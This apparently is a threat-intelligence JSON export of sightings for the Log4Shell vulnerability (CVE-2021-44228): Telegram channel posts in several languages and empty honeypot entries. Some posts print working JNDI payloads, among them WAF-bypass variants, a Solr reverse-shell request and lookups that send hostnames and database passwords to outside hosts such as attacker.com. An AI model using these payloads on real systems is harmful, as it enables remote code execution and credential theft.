\u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f\u043c, \u043d\u043e, \u0432 \u0431\u043e\u044e \u0432\u0441\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0435\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u0432.\n \n\u0410 \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043f\u043e\u043b\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0434\u044b\u0440\u0443 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0451\u043a.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Netlab 360, \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0433\u0440\u0443\u0437\u044f\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e Mirai, Muhstik \u0438 Kinsing, \u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0443\u043f\u043d\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0445 DDoS-\u0430\u0442\u0430\u043a. Microsoft 365 Defender Threat Intelligence \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4j \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 Cobalt Strike. \u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0442\u0435, \u043a\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 Log4Shell \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Log4j, \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 \u0438 \u0434\u0440.\n \n\u041d\u043e, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u043b\u0438\u0432\u043a\u0438 \u0441\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0440\u0430\u043d\u0435\u0435, \u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e 10 \u0434\u0435\u043a\u0430\u0431\u0440\u044f. \u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c Cloudflare \u0435\u0449\u0435 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Cisco Talos, \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e \u0434\u0435\u043a\u0430\u0431\u0440\u044f - \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0441\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441.\n \n\u041d\u0443, \u0430 \u043f\u043e\u043a\u0430, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-14T09:28:21.000000Z"}, {"uuid": "c4eddbc6-d3d5-4535-bf42-26c97376d176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/win_def/59", "content": "Merry Christmas!!!\n\n\u0412 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j \u043f\u043e\u0434 Apache \u043d\u043e\u0447\u044c\u044e \u0432\u0434\u0440\u0443\u0433 \u043d\u0430\u0448\u043b\u0430\u0441\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE). \u041a \u044d\u0442\u043e\u043c\u0443 \u0432\u0441\u0435\u043c\u0443 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 PoC, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 GitHub.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC \u0443 \u0434\u044b\u0440\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u0430\u0436\u0435 CVE (\u0441\u0435\u0439\u0447\u0430\u0441 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c - CVE-2021-44228). \u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043a\u0443\u0447\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 - Steam, iCloud \u0438 \u043f\u0440.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Apache log4j \u0432\u043f\u043b\u043e\u0442\u044c \u0434\u043e 2.14.1. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0443\u0436\u0435 \u0438\u0434\u0435\u0442 (\u0441\u0442\u0440\u0430\u043d\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e PoC).\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043c\u0435\u0440\u044b \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044f \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c log4j \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0-rc1, \u043d\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0447\u0430\u0441\u043e\u0432 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0434\u043e 2.15.0-rc2. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c log4j2.formatMsgNoLookups \u0432 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true.\n\n\u0422\u0430\u043a\u0436\u0435 LunaSec \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043a\u0438\u0442\u0430\u0439\u0446\u0435\u0432 \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 JDK \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1.\n\n\u041d\u0443 \u0430 \u0432\u0438\u0448\u0435\u043d\u043a\u0430 \u043d\u0430 \u044d\u0442\u043e\u043c \u0440\u043e\u0436\u0434\u0435\u0441\u0442\u0432\u0435\u043d\u0441\u043a\u043e\u043c \u0442\u043e\u0440\u0442\u0435 - \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Minecraft \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 1.8.8. \n\nApache Foundation \u043f\u044c\u044e\u0442 \u0432\u0430\u043b\u0435\u0440\u044c\u044f\u043d\u043a\u0443 \u0438 \u043c\u043e\u043b\u0447\u0430\u0442.\n\nMerry Christmas, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-10T11:55:09.000000Z"}, {"uuid": "06690aa4-d16b-43e3-b4ed-08e2c357d5af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/LearnExploit/3111", "content": "CVE-2021-44228\n\n * \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0633\u06cc\u0627\u0631 \u062c\u062f\u06cc \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Log4J *\n\n\u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0633\u06cc\u0627\u0631 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0628\u0647 \u0646\u0627\u0645 LogShell \u06a9\u0647 \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Log4J \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f . \n\n\u0634\u0631\u06a9\u062a \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631\u06cc Apache \u067e\u0686 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u0631\u0628\u0648\u0637 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u0627\u0632 \u0646\u0648\u0639 Zeroday \u0628\u0648\u062f \u0631\u0648 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0628\u0647 \u0637\u0648\u0631 \u0641\u0639\u0627\u0644 \u0645\u0648\u0631\u062f \u0641\u0639\u0627\u0644 \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u06af\u06cc\u0631\u062f. \n\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u06cc\u0646 \u0627\u062c\u0627\u0632\u0647 \u0631\u0648 \u0628\u0647 \u0647\u06a9\u0631 \u0645\u06cc\u062f\u0647 \u06a9\u0647 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u06a9\u062f \u0632\u062f\u0646 \u0628\u06a9\u0646\u0647 ( RCE )\n\n\u062c\u0627\u0646 \u06af\u0631\u0627\u0647\u0627\u0645 \u06a9\u0627\u0645\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631 \u0627\u0631\u0634\u062f CloudFlare \u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0628\u0637\u0647 \u0645\u06cc\u06af\u0648\u06cc\u062f : \n\n\u0628\u0647\u200c\u062f\u0644\u06cc\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u06cc \u06af\u0633\u062a\u0631\u062f\u0647 \u0627\u0632 \u062c\u0627\u0648\u0627 \u0648 log4j\u060c \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0633\u06cc\u0627\u0631 \u062c\u062f\u06cc \u0648 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0627\u0633\u062a. \u062d\u062c\u0645 \u0639\u0638\u06cc\u0645\u06cc \u0627\u0632 \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u062c\u0627\u0648\u0627 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0648 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0628\u06a9\u200c\u0627\u0646\u062f \u0645\u062a\u0635\u0644 \u0627\u0633\u062a. \u0648\u0642\u062a\u06cc \u0628\u0647 \u200d\u06f1\u06f0 \u0633\u0627\u0644 \u06af\u0630\u0634\u062a\u0647 \u0646\u06af\u0627\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0645\u060c \u062a\u0646\u0647\u0627 \u062f\u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0634\u0627\u0628\u0647 \u062f\u06cc\u06af\u0631 \u0628\u0647 \u0630\u0647\u0646\u0645 \u0645\u06cc\u200c\u0631\u0633\u062f: \u06cc\u06a9\u06cc Heartbleed \u06a9\u0647 \u0628\u0647 \u0634\u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0633\u0631\u0648\u0631\u0647\u0627\u06cc\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u0628\u0627\u06cc\u062f \u0627\u0645\u0646 \u0628\u0627\u0634\u062f \u0648 \u062f\u06cc\u06af\u0631\u06cc Shellshock \u06a9\u0647 \u0628\u0647 \u0634\u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0631\u0648\u06cc \u0633\u06cc\u0633\u062a\u0645\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0627\u062f.\n\n\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u062f\u0627\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u00bb 2.0 \u062a\u0627 2.14.1 \n\u0646\u0633\u062e\u0647 \u0641\u06cc\u06a9\u0633 \u0634\u062f\u0647 \u00bb 2.15.0\n\nExploit \n\nAnother Exploit On Github  \n\n#RCE #Log4J #Java \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-12-11T18:43:34.000000Z"}, {"uuid": "fdcd9bda-7b89-4072-8b26-661643de3232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/LearnExploit/3116", "content": "Apache Log4j 2.14.1 RCE (CVE-2021-44228)\n\nBypass WAF :\n\n1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n\n2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n\n3- ${jndi:rmi://adsasd.asdasd.asdasd}\n\n4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n\nBypass RC1 :\n\n${jndi:ldap://127.0.0.1:1389/ badClassName}\n\nGithub \n\n#Log4J #Java \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-12-13T09:37:57.000000Z"}, {"uuid": "2385a8d2-0431-4ed6-b8a4-ab7502a3339e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/LearnExploit/3118", "content": "CVE-2021-44228\n\napache solr exploit \n\n/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&amp;wt=json\n\n\u0645\u0646\u0628\u0639 : Security Analysis\n#log4j #apache\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-12-13T12:30:30.000000Z"}, {"uuid": "f80a029f-edbd-4081-88b6-e280b3370bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/LearnExploit/4351", "content": "1. Follina (CVE-2022-30190)\n\n2. Log4Shell (CVE-2021-44228)\n\n3. Spring4Shell (CVE-2022-22965)\n\n4. F5 BIG-IP (CVE-2022-1388)\n\n5. Google Chrome zero-day (CVE-2022-0609)\n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n#Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}, {"uuid": "eb2b4822-d55c-4327-86eb-2484a90af223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-04)", "content": "", "creation_timestamp": "2026-05-04T00:00:00.000000Z"}, {"uuid": "658f9dca-eb69-4917-9069-6afec22bd3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/club31337/818", "content": "https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads", "creation_timestamp": "2024-11-09T02:11:59.000000Z"}, {"uuid": "b9309cfc-1579-42d5-89df-9b4c82d75746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-30)", "content": "", "creation_timestamp": "2026-04-30T00:00:00.000000Z"}, {"uuid": "65d74a72-3386-473c-b848-21fecbea8a92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/kasraone_com/653", "content": "\ud83d\udd34 Log4Shell\n\n\nCVE-2021-44228 Log4Shell\n\n\n\n\ud83d\udd34 Apache Log4j2 &lt;=2.14.1 \n\n\nPayloads\n\nJava\n# Identify Java version and hostname\n${jndi:ldap://${java:version}.domain/a}\n${jndi:ldap://${env:JAVA_VERSION}.domain/a}\n${jndi:ldap://${sys:java.version}.domain/a}\n${jndi:ldap://${sys:java.vendor}.domain/a}\n${jndi:ldap://${hostName}.domain/a}\n${jndi:dns://${hostName}.domain}\n\n# More enumerations keywords and variables\njava:os\ndocker:containerId\nweb:rootDir\nbundle:config:db.password\n\n\n\n\ud83d\udd34WAF Bypass\n\n\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}\n\n# using lower and upper\n${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}\n${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}\n${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}\n\n# using env to create the letter\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}\n${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}\n\n\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2661 \u2800\u2800 \u3007\u2800\u00a0 \u2800 \u2399\u2800\u200c \u200c \u2332\u2063 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u02e1\u2071\u1d4f\u1d49\u00a0 \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57\u00a0 \u02e2\u1d43\u1d5b\u1d49\u00a0 \u02e2\u02b0\u1d43\u02b3\u1d49\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 K1\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 kasraone", "creation_timestamp": "2024-02-15T06:26:19.000000Z"}, {"uuid": "44b7fb65-adc8-4ce8-8f1f-852819b41fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-04)", "content": "", "creation_timestamp": "2026-05-04T00:00:00.000000Z"}, {"uuid": "30359072-90d0-424e-b76b-0c142e13a961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/tarnkappe/4075", "content": "\ud83d\udcec Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison #FreeWortley #log4j #Log4Shell #Patchploit https://tarnkappe.info/log4shell-patch-per-exploit-cve-2021-44228-cve-2021-45046/", "creation_timestamp": "2021-12-16T22:18:05.000000Z"}, {"uuid": "95238513-39e9-409e-9f69-2a3e45555368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-05)", "content": "", "creation_timestamp": "2026-05-05T00:00:00.000000Z"}, {"uuid": "ca2d3bc3-60d0-4454-9464-bc92080b122b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-07)", "content": "", "creation_timestamp": "2026-05-07T00:00:00.000000Z"}, {"uuid": "438c38a6-c5e5-46ab-abaf-0056374e2454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-05)", "content": "", "creation_timestamp": "2026-05-05T00:00:00.000000Z"}, {"uuid": "155ea588-8f6d-4249-8c24-d5fee838c097", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-06)", "content": "", "creation_timestamp": "2026-05-06T00:00:00.000000Z"}, {"uuid": "c5af3a9b-283c-4e66-b58a-d5b66edf6fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-07)", "content": "", "creation_timestamp": "2026-05-07T00:00:00.000000Z"}]}